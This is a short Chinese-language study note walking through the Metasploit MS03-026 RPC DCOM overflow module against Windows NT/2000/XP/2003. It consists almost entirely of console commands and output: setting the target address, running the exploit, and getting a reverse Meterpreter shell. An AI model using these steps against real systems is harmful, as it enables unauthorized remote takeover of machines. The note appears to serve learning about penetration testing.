metasploit学习之ms03_026

傻瓜式利用ms03_026_dcom:

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great MS03-026 Microsoft RPC DCOM Interface Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 good MS04-031 Microsoft NetDDE Service Overflow
exploit/windows/smb/psexec_psh 1999-01-01 manual Microsoft Windows Authenticated Powershell Command Execution


msf > use exploit/windows/dcerpc/ms03_026_dcom //设置漏洞代码
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port


Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > set RHOST 10.0.0.5
RHOST => 10.0.0.5
msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 10.0.0.100:4444 
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Sending exploit ...
[*] Sending stage (770048 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.100:4444 -> 10.0.0.5:1231) at 2015-04-25 17:08:20 +0800

meterpreter >       //成功了!

 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。